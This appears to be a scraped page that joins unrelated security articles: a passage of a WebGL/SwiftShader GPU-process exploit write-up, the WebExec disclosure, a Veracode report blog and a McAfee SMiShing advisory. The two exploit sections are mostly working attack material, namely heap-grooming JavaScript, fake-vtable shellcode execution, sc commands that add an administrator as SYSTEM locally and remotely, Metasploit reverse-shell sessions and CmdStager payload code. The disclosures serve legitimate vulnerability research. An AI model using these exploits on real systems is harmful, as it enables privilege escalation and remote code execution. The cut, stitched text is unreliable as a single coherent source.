   gl.readPixels(0, dst_height - 1, dst_width, 1, gl.RGBA, gl.UNSIGNED_BYTE, leak_data);
   return leak_data.buffer;

 return this;

This might seem like quite a crude leak primitive, but since SwiftShader is using the system heap, it’s quite easy to arrange for the memory directly following this allocation to be accessible safely.

And a second bug

Now, the next vulnerability we have is a use-after-free of an egl::ImageImplementation object caused by a reference count overflow. This object is quite a nice object from an exploitation perspective, since from javascript we can read and write from the data it stores, so it seems like the nicest exploitation approach would be to replace this object with a corrupted version; however, as it’s a c++ object we’ll need to break ASLR in the GPU process to achieve this. If you’re reading along in the exploit code, the function leak_image in feng_shader.html implements a crude spray of egl::ImageImplementation objects and uses the information leak above to find an object to copy.

So - a stock-take. We’ve just free’d an object, and we know exactly what the data that *should* be in that object looks like. This seems straightforward - now we just need to find a primitive that will allow us to replace it!

This was actually the most frustrating part of the exploit. Due to the multiple levels of validation/duplication/copying that occur when OpenGL commands are passed from WebGL to the GPU process (Initial WebGL validation (in renderer), GPU command buffer interface, ANGLE validation), getting a single allocation of a controlled size with controlled data is non-trivial! The majority of allocations that you’d expect to be useful (image/texture data etc.) end up having lots of size restrictions or being rounded to different sizes.

However, there is one nice primitive for doing this - shader uniforms. This is the way in which parameters are passed to programmable GPU shaders; and if we look in the SwiftShader code we can see that (eventually) when these are allocated they will do a direct call to operator new[]. We can read and write from the data stored in a uniform, so this will give us the primitive that we need.

The code below implements this technique for (very basic) heap grooming in the SwiftShader/GPU process, and an optimised method for overflowing the reference count. The shader source code (the first bold section) will cause 4 allocations of size 0xf0 when the program object is linked, and the second bold section is where the original object will be free’d and replaced by a shader uniform object.

function issue_1585(gl, fake) {
 let vertex_shader = gl.createShader(gl.VERTEX_SHADER);
 gl.shaderSource(vertex_shader, `
   attribute vec4 position;
   uniform int block0[60];
   uniform int block1[60];
   uniform int block2[60];
   uniform int block3[60];

   void main() {
     gl_Position = position;
     gl_Position.x += float(block0[0]);
     gl_Position.x += float(block1[0]);
     gl_Position.x += float(block2[0]);
     gl_Position.x += float(block3[0]);

 let fragment_shader = gl.createShader(gl.FRAGMENT_SHADER);
 gl.shaderSource(fragment_shader, `
   void main() {
     gl_FragColor = vec4(0.0, 0.0, 0.0, 0.0);

 this.program = gl.createProgram();
 gl.attachShader(this.program, vertex_shader);
 gl.attachShader(this.program, fragment_shader);

 const uaf_width = 8190;
 const uaf_height = 8190;

 this.fb = gl.createFramebuffer();
 uaf_rb = gl.createRenderbuffer();

 gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.fb);
 gl.bindRenderbuffer(gl.RENDERBUFFER, uaf_rb);
 gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA32UI, uaf_width, uaf_height);
 gl.framebufferRenderbuffer(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, uaf_rb);

 let tex = gl.createTexture();
 gl.bindTexture(gl.TEXTURE_CUBE_MAP, tex);
 // trigger
 for (i = 2; i < 0x10; ++i) {
   gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);

 function unroll(gl) {
   gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
   // snip ...
   gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);

 for (i = 0x10; i < 0x100000000; i += 0x10) {

 // the egl::ImageImplementation for the rendertarget of uaf_rb is now 0, so
 // this call will free it, leaving a dangling reference
 gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, 256, 256, 0);

 // replace the allocation with our shader uniform.

 function wait(ms) {
   var start =,
   now = start;
   while (now - start < ms) {
     now =;

 function read(uaf, index) {
   var read_data = new Int32Array(60);
   for (var i = 0; i < 60; ++i) {
     read_data[i] = gl.getUniform(uaf.program, gl.getUniformLocation(uaf.program, 'block' + index.toString() + '[' + i.toString() + ']'));
   return read_data.buffer;

 function write(uaf, index, buffer) {
   gl.uniform1iv(gl.getUniformLocation(uaf.program, 'block' + index.toString()), new Int32Array(buffer));
 } = function() {
   return read(this, this.index);

 this.write = function(buffer) {
   return write(this, this.index, buffer);

 for (var i = 0; i < 4; ++i) {
   write(this, i, fake.buffer);

 gl.readPixels(0, 0, 2, 2, gl.RGBA_INTEGER, gl.UNSIGNED_INT, new Uint32Array(2 * 2 * 16));
 for (var i = 0; i < 4; ++i) {
   data = new DataView(read(this, i));
   for (var j = 0; j < 0xf0; ++j) {
     if (fake.getUint8(j) != data.getUint8(j)) {
       log('uaf block index is ' + i.toString());
       this.index = i;
       return this;

At this point we can modify the object to allow us to read and write from all of the GPU process’ memory; see the read_write function for how the gl.readPixels and gl.blitFramebuffer methods are used for this.

Now, it should be fairly trivial to get arbitrary code execution from this point, although it’s often a pain to get your ROP chain to line up nicely when you have to replace a c++ object, this is a very tractable problem. It turns out, though, that there’s another trick that will make this exploit more elegant.

SwiftShader uses JIT compilation of shaders to get as high performance as possible - and that JIT compiler uses another c++ object to handle loading and mapping the generated ELF executables into memory. Maybe we can create a fake object that uses our egl::ImageImplementation object as a SubzeroReactor::ELFMemoryStreamer object, and have the GPU process load an ELF file for us as a payload, instead of fiddling around ourselves?

We can - so by creating a fake vtable such that:
egl::ImageImplementation::lockInternal -> egl::ImageImplementation::lockInternal
egl::ImageImplementation::unlockInternal -> ELFMemoryStreamer::getEntry
egl::ImageImplementation::release -> shellcode

When we then read from this image object, instead of returning pixels to javascript, we’ll execute our shellcode payload in the GPU process.


It’s interesting that we can find directly javascript-accessible attack surface in some unlikely places in a modern browser codebase when we look at things sideways - avoiding the perhaps more obvious and highly contested areas such as the main javascript JIT engine.

In many codebases, there is a long history of development and there are many trade-offs made for compatibility and consistency across releases. It’s worth reviewing some of these to see whether the original expectations turned out to be valid after the release of these features, and if they still hold today, or if these features can actually be removed without significant impact to users.

These Factors MUST Work For Every Successful Ransomware Attack. DNS is Always Involved.

A government agency that found itself infected with ransomware and having to pay the ransom to restore service. Another local agency has opted not to pay the ransom and restore operations. Ransomware targeted at organizations is still a threat and even with backups, you have a highly disruptive and public event to try to get back online that comes with serious costs and potentially lost revenue.

Technical Rundown of WebExec

This is a technical rundown of a vulnerability that we've dubbed "WebExec". The summary is: a flaw in WebEx's WebexUpdateService allows anyone with a login to the Windows system where WebEx is installed to run SYSTEM-level code remotely. That's right: this client-side application that doesn't listen on any ports is actually vulnerable to remote code execution! A local or domain account will work, making this a powerful way to pivot through networks until it's patched.

High level details and FAQ at! Below is a technical writeup of how we found the bug and how it works.


This vulnerability was discovered by myself and Jeff McJunkin from Counter Hack during a routine pentest. Thanks to Ed Skoudis for permission to post this writeup.

If you have any questions or concerns, I made an email alias specifically for this issue:!

You can download a vulnerable installer here and a patched one here, in case you want to play with this yourself! It probably goes without saying, but be careful if you run the vulnerable version!


During a recent pentest, we found an interesting vulnerability in the WebEx client software while we were trying to escalate local privileges on an end-user laptop. Eventually, we realized that this vulnerability is also exploitable remotely (given any domain user account) and decided to give it a name: WebExec. Because every good vulnerability has a name!

As far as we know, a remote attack against a 3rd party Windows service is a novel type of attack. We're calling the class "thank you for your service", because we can, and are crossing our fingers that more are out there!

The actual version of WebEx is the latest client build as of August, 2018: Version 3211.0.1801.2200, modified 7/19/2018 SHA1: bf8df54e2f49d06b52388332938f5a875c43a5a7. We've tested some older and newer versions since then, and they are still vulnerable.

WebEx released patch on October 3, but requested we maintain embargo until they release their advisory. You can find all the patching instructions on

The good news is, the patched version of this service will only run files that are signed by WebEx. The bad news is, there are a lot of those out there (including the vulnerable version of the service!), and the service can still be started remotely. If you're concerned about the service being remotely start-able by any user (which you should be!), the following command disables that function:


That removes remote and non-interactive access from the service. It will still be vulnerable to local privilege escalation, though, without the patch.

Privilege Escalation

What initially got our attention is that folder (c:\ProgramData\WebEx\WebEx\Applications\) is readable and writable by everyone, and it installs a service called "webexservice" that can be started and stopped by anybody. That's not good! It is trivial to replace the .exe or an associated .dll with anything we like, and get code execution at the service level (that's SYSTEM). That's an immediate vulnerability, which we reported, and which ZDI apparently beat us to the punch on, since it was fixed on September 5, 2018, based on their report.

Due to the application whitelisting, however, on this particular assessment we couldn't simply replace this with a shell! The service starts non-interactively (ie, no window and no commandline arguments). We explored a lot of different options, such as replacing the .exe with other binaries (such as cmd.exe), but no GUI meant no ability to run commands.

One test that almost worked was replacing the .exe with another whitelisted application, msbuild.exe, which can read arbitrary C# commands out of a .vbproj file in the same directory. But because it's a service, it runs with the working directory c:\windows\system32, and we couldn't write to that folder!

At that point, my curiosity got the best of me, and I decided to look into what webexservice.exe actually does under the hood. The deep dive ended up finding gold! Let's take a look

Deep dive into WebExService.exe

It's not really a good motto, but when in doubt, I tend to open something in IDA. The two easiest ways to figure out what a process does in IDA is the strings windows (shift-F12) and the imports window. In the case of webexservice.exe, most of the strings were related to Windows service stuff, but something caught my eye:

  .rdata:00405438 ; wchar_t aSCreateprocess
  .rdata:00405438 aSCreateprocess:                        ; DATA XREF: sub_4025A0+1E8o
  .rdata:00405438                 unicode 0, <%s::CreateProcessAsUser:%d;%ls;%ls(%d).>,0

I found the import for CreateProcessAsUserW in advapi32.dll, and looked at how it was called:

  .text:0040254E                 push    [ebp+lpProcessInformation] ; lpProcessInformation
  .text:00402554                 push    [ebp+lpStartupInfo] ; lpStartupInfo
  .text:0040255A                 push    0               ; lpCurrentDirectory
  .text:0040255C                 push    0               ; lpEnvironment
  .text:0040255E                 push    0               ; dwCreationFlags
  .text:00402560                 push    0               ; bInheritHandles
  .text:00402562                 push    0               ; lpThreadAttributes
  .text:00402564                 push    0               ; lpProcessAttributes
  .text:00402566                 push    [ebp+lpCommandLine] ; lpCommandLine
  .text:0040256C                 push    0               ; lpApplicationName
  .text:0040256E                 push    [ebp+phNewToken] ; hToken
  .text:00402574                 call    ds:CreateProcessAsUserW

The W on the end refers to the UNICODE ("wide") version of the function. When developing Windows code, developers typically use CreateProcessAsUser in their code, and the compiler expands it to CreateProcessAsUserA for ASCII, and CreateProcessAsUserW for UNICODE. If you look up the function definition for CreateProcessAsUser, you'll find everything you need to know.

In any case, the two most important arguments here are hToken - the user it creates the process as - and lpCommandLine - the command that it actually runs. Let's take a look at each!


The code behind hToken is actually pretty simple. If we scroll up in the same function that calls CreateProcessAsUserW, we can just look at API calls to get a feel for what's going on. Trying to understand what code's doing simply based on the sequence of API calls tends to work fairly well in Windows applications, as you'll see shortly.

At the top of the function, we see:

  .text:0040241E                 call    ds:CreateToolhelp32Snapshot

This is a normal way to search for a specific process in Win32 - it creates a "snapshot" of the running processes and then typically walks through them using Process32FirstW and Process32NextW until it finds the one it needs. I even used the exact same technique a long time ago when I wrote my Injector tool for loading a custom .dll into another process (sorry for the bad code.. I wrote it like 15 years ago).

Based simply on knowledge of the APIs, we can deduce that it's searching for a specific process. If we keep scrolling down, we can find a call to _wcsicmp, which is a Microsoft way of saying stricmp for UNICODE strings:

  .text:00402480                 lea     eax, [ebp+Str1]
  .text:00402486                 push    offset Str2     ; "winlogon.exe"
  .text:0040248B                 push    eax             ; Str1
  .text:0040248C                 call    ds:_wcsicmp
  .text:00402492                 add     esp, 8
  .text:00402495                 test    eax, eax
  .text:00402497                 jnz     short loc_4024BE

Specifically, it's comparing the name of each process to "winlogon.exe" - so it's trying to get a handle to the "winlogon.exe" process!

If we continue down the function, you'll see that it calls OpenProcess, then OpenProcessToken, then DuplicateTokenEx. That's another common sequence of API calls - it's how a process can get a handle to another process's token. Shortly after, the token it duplicates is passed to CreateProcessAsUserW as hToken.

To summarize: this function gets a handle to winlogon.exe, duplicates its token, and creates a new process as the same user (SYSTEM). Now all we need to do is figure out what the process is!

An interesting takeaway here is that I didn't really really read assembly at all to determine any of this: I simply followed the API calls. Often, reversing Windows applications is just that easy!


This is where things get a little more complicated, since there are a series of function calls to traverse to figure out lpCommandLine. I had to use a combination of reversing, debugging, troubleshooting, and eventlogs to figure out exactly where lpCommandLine comes from. This took a good full day, so don't be discouraged by this quick summary - I'm skipping an awful lot of dead ends and validation to keep just to the interesting bits.

One such dead end: I initially started by working backwards from CreateProcessAsUserW, or forwards from main(), but I quickly became lost in the weeds and decided that I'd have to go the other route. While scrolling around, however, I noticed a lot of debug strings and calls to the event log. That gave me an idea - I opened the Windows event viewer (eventvwr.msc) and tried to start the process with sc start webexservice:

C:\Users\ron>sc start webexservice

SERVICE_NAME: webexservice
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)

You may need to configure Event Viewer to show everything in the Application logs, I didn't really know what I was doing, but eventually I found a log entry for WebExService.exe:

  ExecuteServiceCommand::Not enough command line arguments to execute a service command.

That's handy! Let's search for that in IDA (alt+T)! That leads us to this code:

  .text:004027DC                 cmp     edi, 3
  .text:004027DF                 jge     short loc_4027FD
  .text:004027E1                 push    offset aExecuteservice ; &quot;ExecuteServiceCommand&quot;
  .text:004027E6                 push    offset aSNotEnoughComm ; &quot;%s::Not enough command line arguments t&quot;...
  .text:004027EB                 push    2               ; wType
  .text:004027ED                 call    sub_401770

A tiny bit of actual reversing: compare edit to 3, jump if greater or equal, otherwise print that we need more commandline arguments. It doesn't take a huge logical leap to determine that we need 2 or more commandline arguments (since the name of the process is always counted as well). Let's try it:

C:\Users\ron>sc start webexservice a b


Then check Event Viewer again:

  ExecuteServiceCommand::Service command not recognized: b.

Don't you love verbose error messages? It's like we don't even have to think! Once again, search for that string in IDA (alt+T) and we find ourselves here:

  .text:00402830 loc_402830:                             ; CODE XREF: sub_4027D0+3Dj
  .text:00402830                 push    dword ptr [esi+8]
  .text:00402833                 push    offset aExecuteservice ; "ExecuteServiceCommand"
  .text:00402838                 push    offset aSServiceComman ; "%s::Service command not recognized: %ls"...
  .text:0040283D                 push    2               ; wType
  .text:0040283F                 call    sub_401770

If we scroll up just a bit to determine how we get to that error message, we find this:

  .text:004027FD loc_4027FD:                             ; CODE XREF: sub_4027D0+Fj
  .text:004027FD                 push    offset aSoftwareUpdate ; "software-update"
  .text:00402802                 push    dword ptr [esi+8] ; lpString1
  .text:00402805                 call    ds:lstrcmpiW
  .text:0040280B                 test    eax, eax
  .text:0040280D                 jnz     short loc_402830 ; <-- Jumps to the error we saw
  .text:0040280F                 mov     [ebp+var_4], eax
  .text:00402812                 lea     edx, [esi+0Ch]
  .text:00402815                 lea     eax, [ebp+var_4]
  .text:00402818                 push    eax
  .text:00402819                 push    ecx
  .text:0040281A                 lea     ecx, [edi-3]
  .text:0040281D                 call    sub_4025A0

The string software-update is what the string is compared to. So instead of b, let's try software-update and see if that gets us further! I want to once again point out that we're only doing an absolutely minimum amount of reverse engineering at the assembly level - we're basically entirely using API calls and error messages!

Here's our new command:

C:\Users\ron>sc start webexservice a software-update


Which results in the new log entry:

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Exception code: 0xc0000005
  Fault offset: 0x00002643
  Faulting process id: 0x654
  Faulting application start time: 0x01d42dbbf2bcc9b8
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Report Id: 31555e60-99af-11e8-8391-0800271677bd

Uh oh! I'm normally excited when I get a process to crash, but this time I'm actually trying to use its features! What do we do!?

First of all, we can look at the exception code: 0xc0000005. If you Google it, or develop low-level software, you'll know that it's a memory fault. The process tried to access a bad memory address (likely NULL, though I never verified).

The first thing I tried was the brute-force approach: let's add more commandline arguments! My logic was that it might require 2 arguments, but actually use the third and onwards for something then crash when they aren't present.

So I started the service with the following commandline:

C:\Users\ron>sc start webexservice a software-update a b c d e f


That led to a new crash, so progress!

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f7ce6
  Exception code: 0x40000015
  Fault offset: 0x000a7676
  Faulting process id: 0x774
  Faulting application start time: 0x01d42dbc22eef30e
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\MSVCR120.dll
  Report Id: 60a0439c-99af-11e8-8391-0800271677bd

I had to google 0x40000015; it means STATUS_FATAL_APP_EXIT. In other words, the app exited, but hard - probably a failed assert()? We don't really have any output, so it's hard to say.

This one took me awhile, and this is where I'll skip the deadends and debugging and show you what worked.

Basically, keep following the codepath immediately after the software-update string we saw earlier. Not too far after, you'll see this function call:

  .text:0040281D                 call    sub_4025A0

If you jump into that function (double click), and scroll down a bit, you'll see:

  .text:00402616                 mov     [esp+0B4h+var_70], offset aWinsta0Default ; "winsta0\\Default"

I used the most advanced technique in my arsenal here and googled that string. It turns out that it's a handle to the default desktop and is frequently used when starting a new process that needs to interact with the user. That's a great sign, it means we're almost there!

A little bit after, in the same function, we see this code:

  .text:004026A2                 push    eax             ; EndPtr
  .text:004026A3                 push    esi             ; Str
  .text:004026A4                 call    ds:wcstod ; <--
  .text:004026AA                 add     esp, 8
  .text:004026AD                 fstp    [esp+0B4h+var_90]
  .text:004026B1                 cmp     esi, [esp+0B4h+EndPtr+4]
  .text:004026B5                 jnz     short loc_4026C2
  .text:004026B7                 push    offset aInvalidStodArg ; &quot;invalid stod argument&quot;
  .text:004026BC                 call    ds:?_Xinvalid_argument@std@@YAXPBD@Z ; std::_Xinvalid_argument(char const *)

The line with an error - wcstod() is close to where the abort() happened. I'll spare you the debugging details - debugging a service was non-trivial - but I really should have seen that function call before I got off track.

I looked up wcstod() online, and it's another of Microsoft's cleverly named functions. This one converts a string to a number. If it fails, the code references something called std::_Xinvalid_argument. I don't know exactly what it does from there, but we can assume that it's looking for a number somewhere.

This is where my advice becomes "be lucky". The reason is, the only number that will actually work here is "1". I don't know why, or what other numbers do, but I ended up calling the service with the commandline:

C:\Users\ron>sc start webexservice a software-update 1 2 3 4 5 6

And checked the event log:

  StartUpdateProcess::CreateProcessAsUser:1;1;2 3 4 5 6(18).

That looks awfully promising! I changed 2 to an actual process:

  C:\Users\ron>sc start webexservice a software-update 1 calc c d e f

And it opened!

C:\Users\ron>tasklist | find "calc"
calc.exe                      1476 Console                    1     10,804 K

It actually runs with a GUI, too, so that's kind of unnecessary. I could literally see it! And it's running as SYSTEM!

Speaking of unknowns, running cmd.exe and powershell the same way does not appear to work. We can, however, run wmic.exe and net.exe, so we have some choices!

Local exploit

The simplest exploit is to start cmd.exe with wmic.exe:

C:\Users\ron>sc start webexservice a software-update 1 wmic process call create "cmd.exe"

That opens a GUI cmd.exe instance as SYSTEM:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

nt authority\system

If we can't or choose not to open a GUI, we can also escalate privileges:

C:\Users\ron>net localgroup administrators

C:\Users\ron>sc start webexservice a software-update 1 net localgroup administrators testuser /add

C:\Users\ron>net localgroup administrators

And this all works as an unprivileged user!

Jeff wrote a local module for Metasploit to exploit the privilege escalation vulnerability. If you have a non-SYSTEM session on the affected machine, you can use it to gain a SYSTEM account:

meterpreter > getuid
Server username: IEWIN7\IEUser

meterpreter > background
[*] Backgrounding session 2...

msf exploit(multi/handler) > use exploit/windows/local/webexec
msf exploit(windows/local/webexec) > set SESSION 2

msf exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/local/webexec) > set LHOST
msf exploit(windows/local/webexec) > set LPORT 9001
msf exploit(windows/local/webexec) > run

[*] Started reverse TCP handler on
[*] Checking service exists...
[*] Writing 73802 bytes to %SystemRoot%\Temp\yqaKLvdn.exe...
[*] Launching service...
[*] Sending stage (179779 bytes) to
[*] Meterpreter session 2 opened ( -> at 2018-08-31 14:45:25 -0700
[*] Service started...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Remote exploit

We actually spent over a week knowing about this vulnerability without realizing that it could be used remotely! The simplest exploit can still be done with the Windows sc command. Either create a session to the remote machine or create a local user with the same credentials, then run cmd.exe in the context of that user (runas /user:newuser cmd.exe). Once that's done, you can use the exact same command against the remote host:

c:\>sc \\ start webexservice a software-update 1 net localgroup administrators testuser /add

The command will run (and a GUI will even pop up!) on the other machine.

Remote exploitation with Metasploit

To simplify this attack, I wrote a pair of Metasploit modules. One is an auxiliary module that implements this attack to run an arbitrary command remotely, and the other is a full exploit module. Both require a valid SMB account (local or domain), and both mostly depend on the WebExec library that I wrote.

Here is an example of using the auxiliary module to run calc on a bunch of vulnerable machines:

msf5 > use auxiliary/admin/smb/webexec_command
msf5 auxiliary(admin/smb/webexec_command) > set RHOSTS
msf5 auxiliary(admin/smb/webexec_command) > set SMBUser testuser
SMBUser => testuser
msf5 auxiliary(admin/smb/webexec_command) > set SMBPass testuser
SMBPass => testuser
msf5 auxiliary(admin/smb/webexec_command) > set COMMAND calc
COMMAND => calc
msf5 auxiliary(admin/smb/webexec_command) > exploit

[-]    - No service handle retrieved
[+]    - Command completed!
[-]    - No service handle retrieved
[+]    - Command completed!
[+]    - Command completed!
[+]    - Command completed!
[*] - Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed

And here's the full exploit module:

msf5 > use exploit/windows/smb/webexec
msf5 exploit(windows/smb/webexec) > set SMBUser testuser
SMBUser => testuser
msf5 exploit(windows/smb/webexec) > set SMBPass testuser
SMBPass => testuser
msf5 exploit(windows/smb/webexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/webexec) > set RHOSTS
msf5 exploit(windows/smb/webexec) > exploit

[*] - Connecting to the server...
[*] - Authenticating to as user 'testuser'...
[*] - Command Stager progress -   0.96% done (999/104435 bytes)
[*] - Command Stager progress -   1.91% done (1998/104435 bytes)
[*] - Command Stager progress -  98.52% done (102891/104435 bytes)
[*] - Command Stager progress -  99.47% done (103880/104435 bytes)
[*] - Command Stager progress - 100.00% done (104435/104435 bytes)
[*] Started bind TCP handler against
[*] Sending stage (179779 bytes) to

The actual implementation is mostly straight forward if you look at the code linked above, but I wanted to specifically talk about the exploit module, since it had an interesting problem: how do you initially get a meterpreter .exe uploaded to execute it?

I started by using a psexec-like exploit where we upload the .exe file to a writable share, then execute it via WebExec. That proved problematic, because uploading to a share frequently requires administrator privileges, and at that point you could simply use psexec instead. You lose the magic of WebExec!

After some discussion with Egyp7, I realized I could use the Msf::Exploit::CmdStager mixin to stage the command to an .exe file to the filesystem. Using the .vbs flavor of staging, it would write a Base64-encoded file to the disk, then a .vbs stub to decode and execute it!

There are several problems, however:

  • The max line length is ~1200 characters, whereas the CmdStager mixin uses ~2000 characters per line
  • CmdStager uses %TEMP% as a temporary directory, but our exploit doesn't expand paths
  • WebExecService seems to escape quotation marks with a backslash, and I'm not sure how to turn that off

The first two issues could be simply worked around by adding options (once I'd figured out the options to use):

wexec(true) do |opts|
  opts[:flavor] = :vbs
  opts[:linemax] = datastore["MAX_LINE_LENGTH"]
  opts[:temp] = datastore["TMPDIR"]
  opts[:delay] = 0.05

execute_cmdstager() will execute execute_command() over and over to build the payload on-disk, which is where we fix the final issue:

# This is the callback for cmdstager, which breaks the full command into
# chunks and sends it our way. We have to do a bit of finangling to make it
# work correctly
def execute_command(command, opts)
  # Replace the empty string, "", with a workaround - the first 0 characters of "A"
  command = command.gsub('""', 'mid(Chr(65), 1, 0)')

  # Replace quoted strings with Chr(XX) versions, in a naive way
  command = command.gsub(/"[^"]*"/) do |capture|
    capture.gsub(/"/, "") do |c|

  # Prepend "cmd /c" so we can use a redirect
  command = "cmd /c " + command

  execute_single_command(command, opts)

First, it replaces the empty string with mid(Chr(65), 1, 0), which works out to characters 1 - 1 of the string "A". Or the empty string!

Second, it replaces every other string with Chr(n)+Chr(n)+.... We couldn't use &, because that's already used by the shell to chain commands. I later learned that we can escape it and use ^&, which works just fine, but + is shorter so I stuck with that.

And finally, we prepend cmd /c to the command, which lets us echo to a file instead of just passing the > symbol to the process. We could probably use ^> instead.

In a targeted attack, it's obviously possible to do this much more cleanly, but this seems to be a great way to do it generically!

Checking for the patch

This is one of those rare (or maybe not so rare?) instances where exploiting the vulnerability is actually easier than checking for it!

The patched version of WebEx still allows remote users to connect to the process and start it. However, if the process detects that it's being asked to run an executable that is not signed by WebEx, the execution will halt. Unfortunately, that gives us no information about whether a host is vulnerable!

There are a lot of targeted ways we could validate whether code was run. We could use a DNS request, telnet back to a specific port, drop a file in the webroot, etc. The problem is that unless we have a generic way to check, it's no good as a script!

In order to exploit this, you have to be able to get a handle to the service-controlservice (svcctl), so to write a checker, I decided to install a fake service, try to start it, then delete the service. If starting the service returns either OK or ACCESS_DENIED, we know it worked!

Here's the important code from the Nmap checker module we developed:

-- Create a test service that we can query
local webexec_command = "sc create " .. test_service .. " binpath= c:\\fakepath.exe"
status, result = msrpc.svcctl_startservicew(smbstate, open_service_result['handle'], stdnse.strsplit(" ", "install software-update 1 " .. webexec_command))

-- ...

local test_status, test_result = msrpc.svcctl_openservicew(smbstate, open_result['handle'], test_service, 0x00000)

-- If the service DOES_NOT_EXIST, we couldn't run code
if string.match(test_result, 'DOES_NOT_EXIST') then
  stdnse.debug("Result: Test service does not exist: probably not vulnerable")
  msrpc.svcctl_closeservicehandle(smbstate, open_result['handle'])

  vuln.check_results = "Could not execute code via WebExService"
  return report:make_output(vuln)

Not shown: we also delete the service once we're finished.


So there you have it! Escalating privileges from zero to SYSTEM using WebEx's built-in update service! Local and remote! Check out for tools and usage instructions!

SOSS Volume 9 reveals how DevSecOps can overcome the volume and persistence of software flaws

Fall is a favorite season for many – in New England, we have beautiful colors and a chill in the air.  At Veracode, fall is our favorite season because it signifies the release of our annual State of Software Security (SOSS) report. Each year, we welcome the opportunity to share with the industry our insights into common vulnerabilities found in software and how organizations are measuring up to security industry benchmarks throughout the software development lifecycle.

Today, we are releasing SOSS Volume 9 – and I’m proud to say it’s one of the most impactful and rich reports we’ve done to date. Our report goes beyond how organizations’ application security (appsec) programs are performing. This year, we analyzed the data to understand the time it takes for these organizations to actually fix flaws once they’ve been identified in application security scans.

(Hint: it takes time to fix vulnerabilities)

Our ninth iteration of SOSS comes at a time when it feels as if the application security market, once a small slice of the security landscape, is finally growing up. Forrester Research recently forecasted “spending on appsec solutions will grow to $7.1 billion by 2023, up from $2.8 billion in 2017, implying a 16.4 percent compound annual growth rate.” Meanwhile, the 2018 Verizon Data Breach Investigations Report found web application was the top data breach type, leading to increased demand for application security tools.

Perhaps most astounding – while every business out there uses software, those figures may only account for half the total addressable market. In other words, a very large number of businesses are not testing their software security at all.

That’s why one of my biggest takeaways from this year is that while progress is being made, overall, there is a lot of work to do! That’s good news, however, because it means whether they started their appsec program or not, organizations can reduce their risk by creating and using more secure code. 

Here’s a quick look at some of the other major findings from this year’s State of Software Security report:

DevSecOps is proving its worth: one of the most revealing findings of SOSS Volume 9 is that organizations with a DevSecOps model, which tends to incorporate more frequent security scans, incremental fixes, and faster rates of flaw closures into the SDLC, are lowering overall risk. This year’s analysis shows a very strong correlation between high rates of security scanning and lower long-term application risks, which we believe presents a significant piece of evidence for the efficacy of DevSecOps.

Volume of flaws is still extremely high, but customers are getting better at closing them: more than 85 percent of all applications have at least one vulnerability in them, and more than 13 percent have at least one critical severity flaw. Still, we found our customers closed almost 70 percent of vulnerabilities they found, which represents an improvement of 12 percentage points over last year’s report.

Flaws are persistent: pulling the curtain back on the length of time it takes for flaws to be corrected after their initial discovery is ugly, but necessary.

  • More than 70 percent of all flaws remained one month after discovery and nearly 55 percent  remained three months after discovery
  • 25 percent of high and very high severity flaws were not addressed within 290 days of discovery
  • Overall, 25 percent of flaws were fixed within 21 days, while the final 25 percent remained open, well after a year of discovery

Most prevalent common flaws remain the same: breaking down the prevalence of flaws by vulnerability categories shows that all of the usual suspects are present at roughly the same rate as in previous years. In fact, our top 10 most prevalent flaw types have hardly budged in the past year. That means that organizations across the board have made very little headway to create awareness within their development organizations about serious vulnerabilities, like cryptographic flaws, SQL injection, and cross-site scripting. This is most likely a result of organizations struggling to embed security best practices into their SDLC, regardless of where the standards are from.

There is so much more to uncover in this year’s report, including insights by industry sector and by geographic region, that can help organizations understand how appsec factors heavily into the security risks and threats they face.

We’d love to hear your feedback once you’ve had a chance to take a look!

How to Squash the Android/TimpDoor SMiShing Scam

As technology becomes more advanced, so do cybercriminals’ strategies for gaining access to our personal information. And while phishing scams have been around for over two decades, attackers have adapted their methods to “bait” victims through a variety of platforms. In fact, we’re seeing a rise in the popularity of phishing via SMS messages, or SMiShing. Just recently, the McAfee Mobile Research team discovered active SMiShing campaigns that are tricking users into downloading fake voice-messaging apps, called Android/TimpDoor.

So how does Android/TimpDoor infect a user’s device? When a victim receives the malicious text, the content will include a link. If they click on it, they’ll be directed to a fake web page. The website will then prompt the victim to download the app in order to listen to phony voice messages. Once the app has been downloaded, the malware collects the device information including device ID, brand, model, OS version, mobile carrier, connection type, and public/local IP address. TimpDoor allows cybercriminals to use the infected device as a digital intermediary without the user’s knowledge. Essentially, it creates a backdoor for hackers to access users’ home networks.

According to our team’s research, these fake apps have infected at least 5,000 devices in the U.S. since the end of March. So, the next question is what can users do to defend themselves from these attacks? Check out the following tips to stay alert and protect yourself from SMS phishing:

  • Do not install apps from unknown sources. If you receive a text asking you to download something onto your phone from a given link, make sure to do your homework. Research the app developer name, product title, download statistics, and app reviews. Be on the lookout for typos and grammatical errors in the description. This is usually a sign that the app is fake.
